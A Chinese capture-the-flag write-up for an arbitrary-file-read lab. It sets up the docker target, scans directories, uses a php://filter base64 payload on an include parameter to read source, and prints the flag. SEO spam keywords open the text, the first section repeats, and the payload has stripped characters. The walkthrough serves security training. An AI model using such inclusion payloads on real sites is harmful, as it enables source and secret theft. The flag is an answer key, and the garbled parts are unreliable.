惠州网站建设方案报价,西安百度公司,诚讯通网站,怎么做淘宝网站教程1.1漏洞描述
漏洞名称任意文件读取漏洞 afr_1漏洞类型文件读取漏洞等级⭐漏洞环境docker攻击方式
1.2漏洞等级 高危 1.3影响版本 暂无 1.4漏洞复现
1.4.1.基础环境
靶场docker工具BurpSuite
1.4.2.靶场搭建 1.创建docker-compose.yml文件 version: 3.2 services: web: …1.1漏洞描述
漏洞名称任意文件读取漏洞 afr_1漏洞类型文件读取漏洞等级⭐漏洞环境docker攻击方式
1.2漏洞等级 高危 1.3影响版本 暂无 1.4漏洞复现
1.4.1.基础环境
靶场docker工具BurpSuite
1.4.2.靶场搭建 1.创建docker-compose.yml文件 version: 3.2 services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest ports: - 80:80 2.将该代码写入文件 启动方式 docker-compose up -d flag n1book{afr_1_solved} 关闭 sudo docker-compose down 3.访问kali 80端口
搭建成功
1.5深度利用
1.5.1漏洞点
1.dirsearch目录扫描 dirsearch --url http://10.9.47.79
2.查看 /flag.php 3.查看/index.php 发现跳转到 ?phello 所以可能是/index.html包含了?phello 文件包含 4.使用php://fileter 读取读取php源码 ?filepathphp://filter/readconvert.base64-encode/resource[目标文件] 它读取到的结果是base64加密的 PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 5.进行base64解码 6.成功拿到flag n1book{afr_1_solved} 1.6漏洞挖掘
1.6.1指纹信息 1.7修复建议 升级 打补丁 上设备